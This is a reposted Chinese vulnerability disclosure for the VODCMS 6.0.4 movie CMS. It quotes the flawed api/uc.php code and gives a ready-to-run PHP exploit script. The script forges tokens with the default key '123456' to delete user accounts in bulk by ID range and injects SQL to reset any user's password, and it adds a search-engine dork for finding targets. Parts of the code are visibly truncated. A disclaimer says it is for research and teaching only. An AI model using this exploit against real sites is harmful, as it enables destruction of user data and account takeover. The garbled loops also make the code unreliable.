【漏洞】秀影电影程序VODCMS 6.0.4 bugs

admin
admin
admin
140350
文章
117
评论
2021年4月3日19:03:12评论30 views字数 1342阅读4分28秒阅读模式

任意删用户,任意改用户密码bug,及其他暴路径bug

api/uc.php:

$code = $_GET['code'];  //code未过滤
parse_str(authcode($code, 'DECODE', UC_KEY), $get); //覆盖$get数组,注意它用了自己的加密函数
.....
if(time() - $get['time'] > 3600) {  //注意time的值
        exit('Authracation has expiried');
}

if(empty($get)) {
        exit('Invalid Request');
}
$action = $get['action'];
$timestamp = time();
$db = new db();
$db->connect($database['dbhost'], $database['dbuser'], $database['dbpass'], $database['dbname'], $pconnect);
unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);
if($action == 'test') {

        exit(API_RETURN_SUCCEED);

} elseif($action == 'deleteuser') {

        !API_DELETEUSER && exit(API_RETURN_FORBIDDEN);

        //用户删除 API 接口
        $uids = $get['ids'];
        $query = $db->query("DELETE FROM {$tablepre}members WHERE uid IN ($uids)");  // 构造sql语句

        exit(API_RETURN_SUCCEED);

} elseif($action == 'renameuser') {

        !API_RENAMEUSER && exit(API_RETURN_FORBIDDEN);

        //用户改名 API 接口
        $uid = $get['uid'];
        $usernamenew = $get['newusername'];
        echo "UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'"; // 构造sql语句

        $db->query("UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'");

        exit(API_RETURN_SUCCEED);

} elseif($action == 'updatepw') {

        !API_UPDATEPW && exit(API_RETURN_FORBIDDEN);

index.php?mod=feedback&action=report  暴路径
index.php?mod=content&action=comment  暴路径
index.php?mod=api&action=getfromvodcms  暴路径

Exp:

/* google inurl:index.php?mod=category */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

        $ckey_length = 4;

        $key = md5($key ? $key : UC_KEY);
        $keya = md5(substr($key, 0, 16));
        $keyb = md5(substr($key, 16, 16));
        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

        $cryptkey = $keya.md5($keya.$keyc);
        $key_length = strlen($cryptkey);

        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
        $string_length = strlen($string);

        $result = '';
        $box = range(0, 255);

        $rndkey = array();
        for($i = 0; $i
                $rndkey[$i] = ord($cryptkey[$i % $key_length]);
        }

        for($j = $i = 0; $i
                $j = ($j + $box[$i] + $rndkey[$i]) % 256;
                $tmp = $box[$i];
                $box[$i] = $box[$j];
                $box[$j] = $tmp;
        }

        for($a = $j = $i = 0; $i
                $a = ($a + 1) % 256;
                $j = ($j + $box[$a]) % 256;
                $tmp = $box[$a];
                $box[$a] = $box[$j];
                $box[$j] = $tmp;
                $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
        }
        if($operation == 'DECODE') {
                if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
                        return substr($result, 26);
                } else {
                        return '';
                }
        } else {
                return $keyc.str_replace('=', '', base64_encode($result));
        }

}
print_r('
[+]----------VODCMS 6.0.4 UC bug by k4shifz----------[+]

');
if ($argc != 6)
        die('usage:
        exe host path start-userid end-userid 1
        exe host path username password 2
');
switch($argv[5])
{
        case 1:
        {
                //delete users
                $host=$argv[1];
                $path=$argv[2];
                $startuid=$argv[3];
                $enduid=$argv[4];
       
                for($i=$startuid;$i
                {
                        $c=urlencode(authcode('time='.time().'&action=deleteuser&ids='.$i, 'ENCODE', '123456'));
               
                        if ( file_get_contents("http://$host$path/api/uc.php?code=$c")  == "1")
                                echo "user id $i delete success ! n";
                        else
                                echo "user id $i delete failed ! n";
                }
                break;
        }
        case 2:
        {
                $host=$argv[1];
                $path=$argv[2];
                $username=$argv[3];
                $password=md5($argv[4]);
                //change user name or password
                $b=urlencode(authcode('time='.time().'&action=renameuser&uid=' or username=''.$username.'&newusername='.$username.'',password=''.$password, 'deCODE', '123456'));
                if ( file_get_contents("http://$host$path/api/uc.php?code=$b")  == "1")
                        echo "$username's Password has been changed $argv[4] ! n";
                else
                        echo "$username's Password changed failed ! n";
                break;
        }
}

?>

文章来源于lcx.cc:【漏洞】秀影电影程序VODCMS 6.0.4 bugs

相关推荐: 中国菜刀的两个小插件(asp) 扫描常用端口+读取终端端口

    By:nowake     中国菜刀的两个小插件(asp),扫描常用端口,读取终端端口(3389、Mstsc)。 扫描常用端口: ip="127.0.0.1" port="21,23,80,3306,1433,3389,43958" arrport=S…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:03:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】秀影电影程序VODCMS 6.0.4 bugshttp://cn-sec.com/archives/319727.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息